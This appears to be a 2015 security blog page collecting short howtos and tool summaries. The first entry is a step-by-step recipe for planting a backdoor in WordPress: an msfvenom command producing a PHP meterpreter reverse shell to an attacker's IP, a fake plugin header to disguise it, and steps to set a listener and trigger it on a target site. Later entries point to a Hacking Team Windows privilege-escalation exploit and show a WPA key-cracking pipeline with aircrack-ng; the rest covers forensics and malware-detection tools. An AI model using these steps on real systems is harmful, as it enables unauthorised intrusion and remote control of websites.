Aug 3, 2015

Howto: create backdoor in Wordpress

1. Admin access to wordpress

2. Create a php reverse shell using msfvenom and name the file shell.php: msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw > shell.php

3. Add comments on the top of the shell.php to make it a valid plugin and compress it in zip format
<?php
/*
*     Plugin Name: My Shell
*     Plugin URI: https://github.com/r0rshark/wordpress-shell
*     Description: Execute Commands as the webserver you are serving wordpress with
*     Author: r0rshark
*     Version: 0.2
*     Author URI: https://r0rshark.github.io
*                             */
 
4. Setup a listener at your ip and port used in the msfvenom
 
5. Execute the reverse shell by visiting www.target.com/wp-content/plugins/shell/shell.php 

Source: https://r0rshark.github.io/2015/07/30/google/

Howto: Use Scalp (web access log analysis)

1. Download Apache-Scalp
https://code.google.com/p/apache-scalp/

2. Download default_filter.xml
https://raw.githubusercontent.com/PHPIDS/PHPIDS/master/lib/IDS/default_filter.xml

3. Use Scalp
# python scalp-0.4.py --log /var/log/nginx/access.log

Jul 22, 2015

Howto: Memory Acquisition for Forensic

Summary from: https://alexandreborgesbrazil.files.wordpress.com/2014/06/memory-acquisition_win_linux1.pdf

Memory Acquisition on Windows
  • DumpIt from MoonSols (http://www.moonsols.com/downloads/7) using DumpIT.exe
  • Memoryze from Mandiant/FireEye (https://www.mandiant.com/library/MemoryzeSetup3.0.msi) using MemoryDD.bat
Initial analysis with Mandiant's Redline (https://www.mandiant.com/library/Redline-1.12.msi)

Memory acquisition on  Linux System
  • https://code.google.com/p/lime-forensics/downloads/list
  • https://github.com/504ensicslabs/lime
    • Compile with make
    • Install kernel module with command
      • insmod lime-3.7-trunk-amd64.ko  "path=/media/external_drive/kali_memory_dump.bin   format=lime"
    • memory dump will save as /media/external_drive/kali_memory_dump.bin




 
 

Tools: PEframe - PEframe is a open source tool to perform static analysis on (portable executable) malware.

PEframe is a open source tool to perform static analysis on Portable Executable malware

Source:: https://github.com/guelfoweb/peframe

Tools: hacking-team-windows-kernel-lpe - exploit from the Hacking Team leak, written by Eugene Ching/Qavar.

This an exploit for CVE-2015-2426 (MS-078), a Windows kernel local privilege escalation 0day from the Hacking Team archive (email here). It was developed by Eugene Ching / Qavar security. Original contents below:

Windows kernel memory corruption exploit leading to privilege escalation.
Tested on Windows 8.1 fully-patched (as of 28 Jan 2015).
Also tested to work against:
  • Google Chrome, up to v40.0.2214.93 (64-bit); and
  • Google Chrome Canary, up to v42.0.2290.6 canary (64-bit)
assuming a suitable RCE in Chrome (simulated via injecting a thread into Chrome)

Source:: https://github.com/vlad902/hacking-team-windows-kernel-lpe

Jul 18, 2015

Tools: MicEnum

In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Levels(IL)-based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set to files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.
MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of the objects (files and folders) in the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps to detect anomalies in them by spotting different integrity levels.
  • Allows to store and restore this information in an XML file so it may be used for forensic purposes.

Source:: https://www.elevenpaths.com/labstools/micenum/index.html

Howto: Uninstall Global Protect in Mac

1. Go to Global Protect folder
# cd /Applications/GlobalProtect.app/Contents/Resources

2. Run uninstall script
# sudo bash uninstall_gp.sh

Jul 17, 2015

Tools: passgen - an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2

Passgen is an alternative for the random character generator crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output opposed to generating a list like so, (aaaaaaaa, aaaaaaab, aaaaaac, etc).
example usuage with aircrack-ng (python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap)
argument switches are as followed
-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
This application will be updated with new features as needed.

Source:: https://github.com/blmvxer/passgen/

Jul 16, 2015

Tools: Evomalware is a simple BASH script do detect malwares/virus/backdoor/... especially for PHP files.

Evomalware is a simple BASH script do detect malwares/virus/backdoor/... especially for PHP files.

EvoMalware is a BASH script which permits to identify files (PHP only ATM) infected by malwares/virus/backdoor.
The main goal is to be used in a cron job to generate reports, but it can be used in "one shot" mode.
The script uses 3 flat text files as databases:
  • evomalware.filenames, known filenames.
  • evomalware.patterns, known patterns.
  • evomalware.whitelist, files to ignore.
There is also an "aggresive" mode which permits to find suspect files using evomalware.suspect DB.
At each run, the script downloads the last databases.

Source::  https://github.com/evoforge/evomalware